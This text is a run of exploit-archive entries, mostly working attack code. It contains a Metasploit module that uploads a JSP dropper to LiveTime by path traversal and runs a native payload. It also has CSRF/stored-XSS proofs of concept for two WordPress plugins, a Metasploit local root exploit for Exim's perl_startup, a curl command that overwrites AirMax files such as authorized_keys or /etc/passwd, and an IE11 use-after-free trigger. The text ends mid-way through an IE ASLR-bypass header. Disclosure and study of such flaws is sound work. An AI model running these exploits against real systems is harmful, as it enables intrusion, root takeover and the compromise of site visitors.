    mime.add_part(jsp, "application/octet-stream", 'binary', disposition)

    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => normalize_uri(@upload_url),
      'headers' => {
        'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)',
      },
      'cookie' => @cookies,
      'data'   => mime.to_s,
      'ctype'  => "multipart/form-data; boundary=#{mime.bound}"
    })

    # The original's `if not res && res.code == 200` parses as
    # `not (res && res.code == 200)`, which is exactly this guard.
    unless res && res.code == 200
      fail_with(Failure::Unknown, "#{peer} - Failed to upload payload...")
    end

    jsp_name
  end


  # Build the JSP dropper: it base64-decodes the native payload into a
  # temporary file, on Linux chmods it, executes it, and on Linux removes it
  # again. Every Java identifier is randomised per run. Newlines and tabs are
  # stripped from the result, as in the original.
  def create_jsp
    platform = @my_target.platform
    arch = @my_target.arch
    # called for its side effect; the original stored the result in an unused local
    exploit_regenerate_payload(platform, arch)
    base64_exe = Rex::Text.encode_base64(generate_payload_exe({:arch => arch, :platform => platform}))

    native_payload_name = rand_text_alpha(rand(6)+3)
    ext = (@my_target['Platform'] == 'win') ? '.exe' : '.bin'

    var_raw, var_ostream, var_buf, var_decoder, var_tmp, var_path, var_proc2 =
      Array.new(7) { Rex::Text.rand_text_alpha(rand(8) + 3) }

    chmod = ''
    cleanup = ''
    if @my_target['Platform'] == 'linux'
      var_proc1 = Rex::Text.rand_text_alpha(rand(8) + 3)
      chmod = %Q|
      Process #{var_proc1} = Runtime.getRuntime().exec("chmod 777 " + #{var_path});
      Thread.sleep(200);
      |

      var_proc3 = Rex::Text.rand_text_alpha(rand(8) + 3)
      cleanup = %Q|
      Thread.sleep(200);
      Process #{var_proc3} = Runtime.getRuntime().exec("rm " + #{var_path});
      |
    end

    jsp = %Q|
    <%@page import="java.io.*"%>
    <%@page import="sun.misc.BASE64Decoder"%>
    <%
    try {
      String #{var_buf} = "#{base64_exe}";
      BASE64Decoder #{var_decoder} = new BASE64Decoder();
      byte[] #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString());

      File #{var_tmp} = File.createTempFile("#{native_payload_name}", "#{ext}");
      String #{var_path} = #{var_tmp}.getAbsolutePath();

      BufferedOutputStream #{var_ostream} =
        new BufferedOutputStream(new FileOutputStream(#{var_path}));
      #{var_ostream}.write(#{var_raw});
      #{var_ostream}.close();
      #{chmod}
      Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path});
      #{cleanup}
    } catch (Exception e) {
    }
    %>
    |

    # The original ran four gsubs (\n, \t, \r\n, \n); once every "\n" is gone
    # the last two can never match, so removing "\n" and "\t" is equivalent.
    jsp.delete("\n\t")
  end


  # Drives the whole attack: log in to the LiveTime web UI, walk the client
  # import wizard to reach its file-upload form, pick a target/traversal path,
  # upload the JSP dropper through the traversal and request it.
  #
  # Reads USERNAME/PASSWORD from the datastore and sets the instance state the
  # helpers rely on: @cookies (login session), @upload_url and @upload_form
  # (for upload_jsp) and @my_target (set by pick_target, read by create_jsp).
  # Every step that does not yield the expected page aborts via fail_with,
  # which raises, so code after a fail_with only runs on success.
  def exploit
    # `version` is not used anywhere in this method; get_version is presumably
    # kept for its own logging/side effects -- confirm before removing.
    version = get_version

    # 1: get the cookies, the login_url and the password_form and username form names (they vary between versions)
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri('/LiveTime/WebObjects/LiveTime.woa'),
      'headers' => {
        'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)',
      }
    })

    # The login form's action (capture 2) is the POST target for step 2; the
    # optional ";jsessionid=" suffix is deliberately left out of it.
    if res && res.code == 200 && res.body.to_s =~ /class\=\"login\-form\"(.*)action\=\"([\w\/\.]+)(\;jsessionid\=)*/
      login_url = $2
      @cookies = res.get_cookies
      if res.body.to_s =~ /type\=\"password\" name\=\"([\w\.]+)\" \/\>/
        password_form = $1
      else
        # we shouldn't hit this condition at all, this is default for v7+
        password_form = 'password'
      end
      if res.body.to_s =~ /type\=\"text\" name\=\"([\w\.]+)\" \/\>/
        username_form = $1
      else
        # we shouldn't hit this condition at all, this is default for v7+
        username_form = 'username'
      end
    else
      fail_with(Failure::NoAccess, "#{peer} - Failed to get the login URL.")
    end

    # 2: authenticate and get the import_url
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(login_url),
      'headers' => {
        'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)',
      },
      'cookie' => @cookies,
      'vars_post' => {
        username_form => datastore['USERNAME'],
        password_form => datastore['PASSWORD'],
        'ButtonLogin' => 'Login'
      }
    })

    # Either regex leaves the form action in $1: the first matches v7+, the
    # second v6.5.
    if res && res.code == 200 &&
      (res.body.to_s =~ /id\=\"clientListForm\" action\=\"([\w\/\.]+)\"\>/ || # v7 and above
      res.body.to_s =~ /\<form method\=\"post\" action\=\"([\w\/\.]+)\"\>/)   # v6.5
      import_url = $1
    else
      # hmm either the password is wrong or someone else is using "our" account.. .
      # let's try to boot him out
      # LiveTime refuses a second concurrent session for the same account and
      # sends the login form back with this message; re-posting with
      # ButtonLoginOverride instead of ButtonLogin takes the session over.
      if res && res.code == 200 && res.body.to_s =~ /class\=\"login\-form\"(.*)action\=\"([\w\/\.]+)(\;jsessionid\=)*/ &&
        res.body.to_s =~ /This account is in use on another system/

        res = send_request_cgi({
          'method' => 'POST',
          'uri' => normalize_uri(login_url),
          'headers' => {
            'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)',
          },
          'cookie' => @cookies,
          'vars_post' => {
            username_form => datastore['USERNAME'],
            password_form => datastore['PASSWORD'],
            'ButtonLoginOverride' => 'Login'
          }
        })
        if res && res.code == 200 &&
          (res.body.to_s =~ /id\=\"clientListForm\" action\=\"([\w\/\.]+)\"\>/ || # v7 and above
          res.body.to_s =~ /\<form method\=\"post\" action\=\"([\w\/\.]+)\"\>/)   # v6.5
          import_url = $1
        else
          fail_with(Failure::Unknown, "#{peer} - Failed to get the import URL.")
        end
      else
        fail_with(Failure::Unknown, "#{peer} - Failed to get the import URL.")
      end
    end

    # 3: get the upload_url
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(import_url),
      'headers' => {
        'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)',
      },
      'cookie' => @cookies,
      'vars_post' => {
        'ButtonImport' => 'Import'
      }
    })

    if res && res.code == 200 &&
      (res.body.to_s =~ /id\=\"clientImportUploadForm\" action\=\"([\w\/\.]+)\"\>/ ||                         # v7 and above
      res.body.to_s =~ /\<form method\=\"post\" enctype\=\"multipart\/form-data\" action\=\"([\w\/\.]+)\"\>/) # v6.5
      @upload_url = $1
    else
      fail_with(Failure::Unknown, "#{peer} - Failed to get the upload URL.")
    end

    # The file input's name is a WebObjects element id that differs per
    # version, so read it from the step-3 response (fail_with above raised if
    # that response was not the upload page).
    if res.body.to_s =~ /\<input type\=\"file\" name\=\"([0-9\.]+)\" \/\>/
      @upload_form = $1
    else
      # go with the default for 7.1.0, might not work with other versions...
      @upload_form = "0.53.19.0.2.7.0.3.0.0.1.1.1.4.0.0.23"
    end

    # 4: target selection
    @my_target = nil
    # pick_target returns the traversal_path and sets @my_target
    traversal_path = pick_target
    if @my_target.nil?
      fail_with(Failure::NoTarget, "#{peer} - Unable to select a target, we must bail.")
    else
      print_status("#{peer} - Selected target #{@my_target.name} with traversal path #{traversal_path}")
    end

    # When using auto targeting, MSF selects the Windows meterpreter as the default payload.
    # Fail if this is the case and ask the user to select an appropriate payload.
    if @my_target['Platform'] == 'linux' && payload_instance.name =~ /Windows/
      fail_with(Failure::BadConfig, "#{peer} - Select a compatible payload for this Linux target.")
    end

    # 5: generate the JSP with the payload
    jsp = create_jsp
    print_status("#{peer} - Uploading payload...")
    jsp_name = upload_jsp(traversal_path, jsp)
    # The on-disk path to clean up depends on which traversal prefix
    # pick_target chose: an absolute Tomcat webapps path or a relative one.
    if traversal_path.include? '/srv/tomcat6/webapps/'
      register_files_for_cleanup('/srv/tomcat6/webapps/LiveTime/' + jsp_name)
    else
      register_files_for_cleanup('../webapps/LiveTime/' + jsp_name)
    end

    # 6: pwn it!
    # Requesting the page compiles and runs the dropper; the response body is
    # irrelevant (the JSP swallows its own errors), so it is not checked.
    print_status("#{peer} - Requesting #{jsp_name}")
    send_request_raw({'uri' => normalize_uri('LiveTime', jsp_name)})

    handler
  end
end
            
I would like to disclose a CSRF and a stored XSS vulnerability in the Kento Post View Counter WordPress plugin, version 2.8.

The vulnerable Fields for XSS are 

    kento_pvc_numbers_lang
    kento_pvc_today_text
    kento_pvc_total_text

Combining the CSRF with the stored XSS can do serious damage to a site: the `kento_pvc_today_text` and `kento_pvc_total_text` values are rendered in the view-counter footer of every post, for authenticated and unauthenticated visitors alike. A single successful CSRF against a logged-in administrator therefore plants JavaScript that executes in the browser of every visitor on almost every page of the site.




The plugin can be found at https://wordpress.org/plugins/kento-post-view-counter/


The CSRF was tested against the latest WordPress release at the time (4.4.2) with both Firefox and Chrome.


The Code for CSRF.html is 

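<!--
  CSRF proof of concept for Kento Post View Counter 2.8.

  Submitting this form from any origin while a WordPress user who can open
  admin.php?page=kentopvc_settings is logged in stores the kento_pvc_* options:
  the settings handler only tests $_POST['kentopvc_hidden'] == 'Y' and never
  verifies a nonce, so _wpnonce and _wp_http_referer are deliberately left
  empty to show they are not checked.

  The kento_pvc_today_text value closes the value="..." attribute the settings
  page echoes it into and injects a script. It is HTML-entity encoded here
  because the original PoC wrote the raw payload after value="", which the
  browser parsed as markup and submitted an empty value. Replace
  http://targetsite with the target's WordPress URL.
-->
<html>
  <body>
    <form action="http://targetsite/wp-admin/admin.php?page=kentopvc_settings" method="POST">
      <input type="hidden" name="kentopvc_hidden" value="Y" />
      <input type="hidden" name="option_page" value="kento_pvc_plugin_options" />
      <input type="hidden" name="action" value="update" />
      <!-- Left empty on purpose: the handler never validates either field. -->
      <input type="hidden" name="_wpnonce" value="" />
      <input type="hidden" name="_wp_http_referer" value="" />
      <input type="hidden" name="kento_pvc_posttype[post]" value="1" />
      <input type="hidden" name="kento_pvc_posttype[page]" value="1" />
      <input type="hidden" name="kento_pvc_posttype[attachment]" value="1" />
      <input type="hidden" name="kento_pvc_posttype[revision]" value="1" />
      <input type="hidden" name="kento_pvc_posttype[nav_menu_item]" value="1" />
      <input type="hidden" name="kento_pvc_numbers_lang" value="" />
      <!-- Submitted as: "><script>alert(1);</script> -->
      <input type="hidden" name="kento_pvc_today_text" value="&quot;&gt;&lt;script&gt;alert(1);&lt;/script&gt;" />
      <input type="hidden" name="kento_pvc_total_text" value="" />
      <input type="hidden" name="Submit" value="Save Changes" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>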

The Vulnerable page is 

wp-content\plugins\kento-post-view-counter\kento-pvc-admin.php

The code Reponsible for XSS :

if($_POST['kentopvc_hidden'] == 'Y') {
//Form data sent
if(empty($_POST['kento_pvc_hide']))
{
$kento_pvc_hide ="";
}
else
{
$kento_pvc_hide = $_POST['kento_pvc_hide'];
}
update_option('kento_pvc_hide', $kento_pvc_hide);



if(empty($_POST['kento_pvc_posttype']))
{
$kento_pvc_posttype ="";
}
else
{
$kento_pvc_posttype = $_POST['kento_pvc_posttype'];
}
update_option('kento_pvc_posttype', $kento_pvc_posttype);
if(empty($_POST['kento_pvc_uniq']))
{
$kento_pvc_uniq ="";
}
else
{
$kento_pvc_uniq = $_POST['kento_pvc_uniq'];
}
update_option('kento_pvc_uniq', $kento_pvc_uniq);


$kento_pvc_numbers_lang = $_POST['kento_pvc_numbers_lang'];
update_option('kento_pvc_numbers_lang', $kento_pvc_numbers_lang);

$kento_pvc_today_text = $_POST['kento_pvc_today_text'];
update_option('kento_pvc_today_text', $kento_pvc_today_text);

$kento_pvc_total_text = $_POST['kento_pvc_total_text'];
update_option('kento_pvc_total_text', $kento_pvc_total_text);


--------------------------snip-----------------------
------------------snip ------------------------------




<input type="text" size="20" name="kento_pvc_numbers_lang" id="kento-pvc-numbers-lang"   value ="<?php if (isset($kento_pvc_numbers_lang)) echo $kento_pvc_numbers_lang; ?>" placeholder="0,1,2,3,4,5,6,7,8,9"   /><br />**Write numbers in your language as following 0,1,2,3,4,5,6,7,8,9<br />
   Left blank if you are in English.



<tr valign="top">
<th scope="row">Text For Today View</th>
<td style="vertical-align:middle;">

   <input type="text" size="20" name="kento_pvc_today_text" id="kento-pvc-today-text"   value ="<?php if (isset($kento_pvc_today_text)) echo $kento_pvc_today_text; ?>" placeholder="Views Today "   />

</td>
</tr>


<tr valign="top">
<th scope="row">Text For Total View</th>
<td style="vertical-align:middle;">

   <input type="text" size="20" name="kento_pvc_total_text" id="kento-pvc-total-text"   value ="<?php if (isset($kento_pvc_total_text)) echo $kento_pvc_total_text; ?>" placeholder="Total Views "   />

</td>
</tr>



No anti-CSRF token is verified for this form. WordPress emits a `_wpnonce` field, but the settings handler shown above only tests `$_POST['kentopvc_hidden'] == 'Y'` and never calls `check_admin_referer()` / `wp_verify_nonce()`, so the nonce is never checked and a cross-site POST is accepted. The same handler stores the raw `$_POST` values with `update_option()` and the settings page echoes them back into `value="..."` attributes without `esc_attr()`, which is what turns the CSRF into stored XSS. A fix needs both: verify the nonce before processing the POST, and escape the values on output.


# Author email: cor3sm4sh3r[at]gmail.com
# Contact: https://in.linkedin.com/in/cor3sm4sh3r
# Twitter: https://twitter.com/cor3sm4sh3r
            
I would like to disclose a CSRF and a stored XSS vulnerability in the WordPress plugin LeenkMe, version 2.5.0.

The plugin can be found at https://wordpress.org/plugins/leenkme/

In the page wp-content/plugins/leenkme/facebook.php

XSS vulnerable Fields are :

   - facebook_message
   - facebook_linkname
   - facebook_caption
   - facebook_description
   - default_image
   - _wp_http_referer


The CSRF was tested against the latest WordPress release at the time (4.4.2) with Firefox.

The Code for CSRF.html is

<!--
  CSRF proof of concept for LeenkMe 2.5.0 (facebook.php settings page).

  The form auto-submits on load. fb_publish_wpnonce is left empty on purpose:
  the advisory shows the handler accepts the request anyway, so the nonce is
  emitted but never verified. facebook_description carries the XSS payload;
  the &lt;/textarea&gt; entities decode to a literal </textarea> that closes
  the textarea the value is echoed into. The line breaks inside the action and
  value attributes are mail-wrapping artifacts and are ignored by the browser.
  Replace http://127.0.0.1/wp with the target's WordPress URL.
-->
<html>
  <body onload="document.forms['xss'].submit()" >
    <form name="xss" action="
http://127.0.0.1/wp/wp-admin/admin.php?page=leenkme_facebook" method="POST">
      <input type="hidden" name="facebook_profile" value="on" />
      <!-- Empty on purpose: not validated by the handler. -->
      <input type="hidden" name="fb_publish_wpnonce" value="" />
      <!-- Also listed by the author as a reflected (XSS) field. -->
      <input type="hidden" name="_wp_http_referer" value="XSS" />
      <input type="hidden" name="facebook_message" value="XSS" />
      <input type="hidden" name="facebook_linkname" value="XSS" />
      <input type="hidden" name="facebook_caption" value="XSS" />
      <!-- Submitted as: </textarea><script>prompt();</script> -->
      <input type="hidden" name="facebook_description" value="
&lt;/textarea&gt;<script>prompt();</script>" />
      <input type="hidden" name="default_image" value="XSS" />
      <input type="hidden" name="message_preference" value="author" />
      <input type="hidden" name="clude" value="in" />
      <input type="hidden" name="publish_cats&#91;&#93;" value="0" />
      <input type="hidden" name="update_facebook_settings"
value="Save&#32;Settings" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>


The vulnerable page is

wp-content/plugins/leenkme/facebook.php

The vulnerable code producing XSS is


if ( !empty( $_REQUEST['facebook_message'] ) )
$user_settings['facebook_message'] = $_REQUEST['facebook_message'];
else
$user_settings['facebook_message'] = '';
if ( !empty( $_REQUEST['facebook_linkname'] ) )
$user_settings['facebook_linkname'] = $_REQUEST['facebook_linkname'];
else
$user_settings['facebook_linkname'] = '';
if ( !empty( $_REQUEST['facebook_caption'] ) )
$user_settings['facebook_caption'] = $_REQUEST['facebook_caption'];
else
$user_settings['facebook_caption'] = '';
if ( !empty( $_REQUEST['facebook_description'] ) )
$user_settings['facebook_description'] = $_REQUEST['facebook_description'];


-------------------------
-------------------------
-------------------------
snip
------------------------
-------------------------
--------------------------

<td><textarea name="facebook_message" style="width: 500px;"
maxlength="400"><?php
echo $user_settings['facebook_message']; ?>&lt;/textarea&gt;</td>
                            </tr>
                            <tr>
                             <td><?php _e( 'Default Link Name:', 'leenkme'
); ?></td>
                                <td><input name="facebook_linkname"
type="text" style="width: 500px;" value="<?php echo
$user_settings['facebook_linkname']; ?>"  maxlength="100"/></td>
                            </tr>
                            <tr>
                             <td><?php _e( 'Default Caption:', 'leenkme' );
?></td>
                                <td><input name="facebook_caption"
type="text" style="width: 500px;" value="<?php echo
$user_settings['facebook_caption']; ?>" maxlength="100"/></td>
                            </tr>
                            <tr>
                             <td style='vertical-align: top; padding-top:
5px;'><?php _e( 'Default Description:', 'leenkme' ); ?></td>
                                <td><textarea name="facebook_description"
style="width: 500px;" maxlength="300"><?php echo
$user_settings['facebook_description']; ?>&lt;/textarea&gt;</td>


The code used to protect against CSRF that is the anti csrf token used is

<?php wp_nonce_field( 'fb_publish', 'fb_publish_wpnonce' ); ?>


However, this does not protect against CSRF: `wp_nonce_field()` only emits the token, and the handler excerpt above reads the `$_REQUEST` values without any visible `check_admin_referer('fb_publish', 'fb_publish_wpnonce')` or `wp_verify_nonce()` call. The form is accepted, without any error, with `fb_publish_wpnonce` left empty, confirming the nonce is never validated. The stored values are then echoed back into the textarea and `value="..."` attributes without `esc_textarea()` / `esc_attr()`, which is what makes the injection a stored XSS.



# Author email: cor3sm4sh3r[at]gmail.com
# Contact: https://in.linkedin.com/in/cor3sm4sh3r
# Twitter: https://twitter.com/cor3sm4sh3r
            
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

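class MetasploitModule < Msf::Exploit::Local

  Rank = ExcellentRanking

  def initialize(info = {})
    super(update_info(info,
      'Name'            => 'Exim "perl_startup" Privilege Escalation',
      'Description'     => %q{
        This module exploits a Perl injection vulnerability in Exim < 4.86.2
        given the presence of the "perl_startup" configuration parameter.
      },
      'Author'          => [
        'Dawid Golunski', # Vulnerability discovery
        'wvu'             # Metasploit module
      ],
      'References'      => [
        %w{CVE 2016-1531},
        %w{EDB 39549},
        %w{URL http://www.exim.org/static/doc/CVE-2016-1531.txt}
      ],
      'DisclosureDate'  => 'Mar 10 2016',
      'License'         => MSF_LICENSE,
      'Platform'        => 'unix',
      'Arch'            => ARCH_CMD,
      'SessionTypes'    => %w{shell meterpreter},
      'Privileged'      => true,
      'Payload'         => {
        # A double quote would end the Perl exec "..." string and a single
        # quote would close the shell quoting around PERL5DB in #exploit.
        'BadChars'      => "\x22\x27", # " and '
        'Compat'        => {
          'PayloadType' => 'cmd cmd_bash',
          'RequiredCmd' => 'generic netcat netcat-e bash-tcp telnet'
        }
      },
      'Targets'         => [
        ['Exim < 4.86.2', {}]
      ],
      'DefaultTarget'   => 0
    ))
  end

  # Active check: runs `whoami` through the same injection #exploit uses and
  # reports Vulnerable only when it comes back as root. This is not passive --
  # it really starts the setuid exim binary with PERL5OPT/PERL5DB set.
  #
  # @return [Msf::Exploit::CheckCode]
  def check
    # Normalise the session output (nil, stray CR/LF, trailing spaces) so a
    # vulnerable host is not misreported as Safe because of line endings.
    if exploit('whoami').to_s.strip == 'root'
      CheckCode::Vulnerable
    else
      CheckCode::Safe
    end
  end

  # Runs `c` as root via Exim's embedded Perl interpreter.
  #
  # PERL5OPT=-d makes Perl load the debugger and PERL5DB supplies the debugger
  # code, here `exec "<c>"`. exim is setuid root and, with perl_startup
  # configured, starts its interpreter under those environment variables, so
  # the command runs with root privileges. `-ps` asks exim to start the
  # interpreter immediately rather than on first use, and `2>&-` closes stderr
  # so exim's own messages do not pollute the captured output.
  #
  # NOTE(review): `c` lands inside a Perl double-quoted string, so Perl treats
  # `$`, `@` and `\` in it specially. BadChars only excludes `"` and `'`; a
  # payload containing those other characters must avoid or escape them.
  #
  # @param c [String] command to execute (defaults to the encoded payload)
  # @return [String] output captured by cmd_exec
  def exploit(c = payload.encoded)
    # PERL5DB technique from http://perldoc.perl.org/perlrun.html
    cmd_exec(%Q{PERL5OPT=-d PERL5DB='exec "#{c}"' exim -ps 2>&-})
  end

end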
            
EDB-Note Source: https://hackerone.com/reports/73480

Vulnerability

It is possible to overwrite any file (and create new ones) on AirMax systems because the `login.cgi` upload handler (the "php2" handler — possibly as a result of a patch) does not validate the `filename` value of a multipart POST. The request is processed before authentication, so an unauthenticated user can exploit this.
Example

Consider the following request:

POST https://192.168.1.20/login.cgi HTTP/1.1
Cookie: $Version=0; AIROS_SESSIONID=9192de9ba81691e3e4d869a7207ec80f; $Path=/; ui_language=en_US
Content-Type: multipart/form-data; boundary=---------------------------72971515916103336881230390860
Content-Length: 773
User-Agent: Jakarta Commons-HttpClient/3.1
Host: 192.168.1.20
Cookie: $Version=0; AIROS_SESSIONID=7597f7f30cec75e1faef8fb608fc43bb; $Path=/; ui_language=en_US

-----------------------------72971515916103336881230390860
Content-Disposition: form-data; name="keyfile"; filename="../../etc/dropbear/authorized_keys"
Content-Type: application/vnd.ms-publisher

{{Your Public Key HERE}}
-----------------------------72971515916103336881230390860--

The web server must reduce the supplied file name `../../etc/dropbear/authorized_keys` to its base name (`authorized_keys`) — rejecting path separators and `..` components — or return a 404. Instead, AirMax simply writes the file at the supplied path, overwriting the original (or creating it if it does not exist). Here the attacker uploads an arbitrary SSH public key, but the same primitive can be used to upload configuration files or `/etc/passwd`.
Consequences

It is possible to take full control of any AirMax product with a single forged HTTP POST request, which is disastrous.


Reproducing

With a simple command:
curl -F "file=@.ssh/id_rsa.pub;filename=../../etc/dropbear/authorized_keys" -H "Expect:" 'https://192.168.1.20/login.cgi' -k

If SSH is disabled, the same request can overwrite `/etc/passwd` and/or `/tmp/system.cfg` instead.
            
<!DOCTYPE html>
<html>
  <head>
  <meta http-equiv="refresh" content="1"/>
  <meta http-equiv="content-type" content="text/html; charset=UTF-8">
  <meta http-equiv="Expires" content="0" />
  <meta http-equiv="Cache-Control" content="no-store, no-cache, must-revalidate" />
  <meta http-equiv="Cache-Control" content="post-check=0, pre-check=0" />
  <meta http-equiv="Pragma" content="no-cache" />
  <style type="text/css">
   body{
        background-color:lime;
        font-color:white;
   };
  </style>
  <script type='text/javascript'></script>
  <script type="text/javascript" language="JavaScript">
      /*
      *  Title: MSHTML!CMarkupPointer::UnEmbed Use After Free
      *  Author: Marcin Ressel @ressel_m
      *  Date: 15.04.2016
      *  Vendor Homepage: www.microsoft.com
      *  Software Link: n/a
      *  Version: IE11 (latest)
      *  Tested on: Windows 10 x64 && Windows 7 x64
      *  --------------------------------------------------
      *  IE 11 MSHTML!CMarkupPointer::UnEmbed Use After Free
      *  IE 11.0.9600.18230 (win7)
      *  Windows 7 x64, Windows 10 x64 (11.162.10586.0)
      *  11.04.2016
      *  
         0:019> g
         (490.1194): Access violation - code c0000005 (first chance)
         First chance exceptions are reported before any exception handling.
         This exception may be expected and handled.
         eax=00000000 ebx=0df7bbd0 ecx=126e4f38 edx=00000000 esi=12750fd0 edi=00000000
         eip=67028aa8 esp=0a97a658 ebp=0a97a7bc iopl=0         nv up ei pl nz ac po nc
         cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010212
         MSHTML!CSpliceTreeEngine::HandleRemovalMutations+0xdb:
         67028aa8 8b7610          mov     esi,dword ptr [esi+10h] ds:002b:12750fe0=????????
         0:007> !heap -p -a esi
                address 12750fd0 found in
                _DPH_HEAP_ROOT @ ad81000
               in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                    ffe3410:         12750000             2000
               747790b2 verifier!AVrfDebugPageHeapFree+0x000000c2
               77a5251c ntdll!RtlDebugFreeHeap+0x0000002f
               77a0b2a2 ntdll!RtlpFreeHeap+0x0000005d
               779b2ce5 ntdll!RtlFreeHeap+0x00000142
               74a4adeb vrfcore!VerifierSetAPIClassName+0x0000017b
               769d14bd kernel32!HeapFree+0x00000014
               67011a67 MSHTML!MemoryProtection::HeapFree+0x00000046
               66b08fff MSHTML!CMarkupPointer::UnEmbed+0x000000bd
               66d75a96 MSHTML!CMarkupPointer::MoveToGap+0x00000094
               67006183 MSHTML!CMarkupPointer::FindTextIdentity+0x000002b7
               66d75a22 MSHTML!CDOMTextNode::GetParentNodeHelper+0x0000004b
               6719351c MSHTML!CDOMNode::AppendTransientRegisteredObservers+0x00000035
               66f192f7 MSHTML!CSpliceTreeEngine::HandleRemovalMutations+0xffef092a
               66b47967 MSHTML!CSpliceTreeEngine::RemoveSplice+0x000051ef
               66b49c9f MSHTML!CMarkup::SpliceTreeInternal+0x000000a8
               66d8dc9b MSHTML!CDoc::CutCopyMove+0x00000d93
               66b49a27 MSHTML!RemoveWithBreakOnEmpty+0x00000097
               66b3400d MSHTML!CElement::InjectInternal+0x0000043f
               66dd76d5 MSHTML!CElement::InjectTextOrHTML+0x00000323
               66a857e8 MSHTML!CElement::Var_set_innerText+0x00000050
               66a8576c MSHTML!CFastDOM::CHTMLElement::Trampoline_Set_innerText+0x0000003c
               7330c572 jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x00000182
               7330d075 jscript9!<lambda_73b9149c3f1de98aaab9368b6ff2ae9d>::operator()+0x0000009d
               7330cfb2 jscript9!Js::JavascriptOperators::CallSetter+0x00000076
               7333fdcc jscript9!Js::JavascriptOperators::SetProperty_Internal<0>+0x00000341
               7333fb83 jscript9!Js::JavascriptOperators::OP_SetProperty+0x00000040
               7333fc03 jscript9!Js::JavascriptOperators::PatchPutValueNoFastPath+0x0000004d
               73308800 jscript9!Js::InterpreterStackFrame::Process+0x00002c1e
               7330bd59 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x00000200
      */
			/**
			 * Trigger for the CMarkupPointer::UnEmbed use-after-free.
			 *
			 * Creates six elements in the e1 iframe's document, adopts them into
			 * the top document's body, attaches a MutationObserver to one node and
			 * then mutates that node twice (insertAdjacentHTML, then innerText).
			 * The innerText assignment is what the crash dump above shows
			 * freeing and reusing the markup pointer. Runs from body onload.
			 */
			function testcase()
			{
				var elements = [];
				// Elements are created in the iframe document but inserted into the
				// top document (cross-document adoption).
				var eFrame = document.getElementById("e1");
				var tmp = eFrame.contentWindow.document.createElement("body");
				elements.push(tmp);
				tmp = eFrame.contentWindow.document.createElement("cite");
				elements.push(tmp);
				tmp = eFrame.contentWindow.document.createElement("frame");
				elements.push(tmp);
				tmp = eFrame.contentWindow.document.createElement("ellipse");
				elements.push(tmp);
				tmp = eFrame.contentWindow.document.createElement("html");
				elements.push(tmp);
				tmp = eFrame.contentWindow.document.createElement("command");
				elements.push(tmp);
				var trg = document;
				trg.body.appendChild(elements[0]);
				trg.body.appendChild(elements[1]);
				trg.body.appendChild(elements[2]);
				trg.body.appendChild(elements[3]);
				trg.body.appendChild(elements[4]);
				trg.body.appendChild(elements[5]);
				// `dom` and `doc` are assigned without var, so they become globals
				// (keeping the live collection reachable); `doc` is not read again
				// in this function.
				dom = document.getElementsByTagName("*");
				doc = document;
				// Index 10 of the all-elements collection: counting the tags in this
				// file's <head> that should be the second <script> element (this
				// one) -- confirm in the debugger before relying on it.
				trg = dom[10];
				// Observing the node with subtree/childList makes the removal
				// mutation path (HandleRemovalMutations in the dump) run.
				var observer = new MutationObserver(new Function("",""));
				observer.observe(trg,{ attributes: true, childList: true, characterData: true, subtree: true});
				trg.insertAdjacentHTML("afterBegin","<tbody><ol><script><polygon><circle><table></table><command><table></table><rp>");
				// Replacing the content tears the injected subtree down; this is the
				// Var_set_innerText frame at the bottom of the free stack above.
				trg.innerText = '12345';
			}
  </script>
  <title>IE 11.0.9600.18230 MSHTML!CMarkupPointer::UnEmbed UAF POC</title>
  </head>
  <body onload='testcase();'>
   <iframe id='t1'></iframe><iframe id='e1'></iframe>
   <div id='oneUnArg'>||||</div>
  </body>
</html>
            
<!--

                      CVE-2015-6086
             Out Of Bound Read Vulnerability
     Address Space Layout Randomization (ASLR) Bypass

Improper handling of newline and whitespace characters causes an out-of-bounds read in CDOMStringDataList::InitFromString. The flaw can be used to leak the base address of MSHTML.DLL and thereby bypass Address Space Layout Randomization.

Affected Version:
        Internet Explorer 9
        Internet Explorer 10
        Internet Explorer 11

Test Bed:
        IE: 10 & 11
        KB: KB3087038
        OS: Windows 7 SP1 x86

Advisory:
        http://www.payatu.com/advisory-ie_cdomstringdatalist/
        https://technet.microsoft.com/library/security/MS15-112
        http://www.zerodayinitiative.com/advisories/ZDI-15-547/

Copyright 2016 © Payatu Technologies Pvt. Ltd.

Author: Ashfaq Ansari
Email: ashfaq[at]payatu[dot]com
Websites: www.payatu.com
          www.nullcon.net
          www.hardwear.io
          www.null.co.in

This program is free software: you can redistribute it and/or modify it
under the terms of the GNU General Public License as published by the
Free Software Foundation, either version 3 of the License, or (at your
option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with
this program.  If not, see <http://www.gnu.org/licenses/>.

THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
PARTICULAR PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
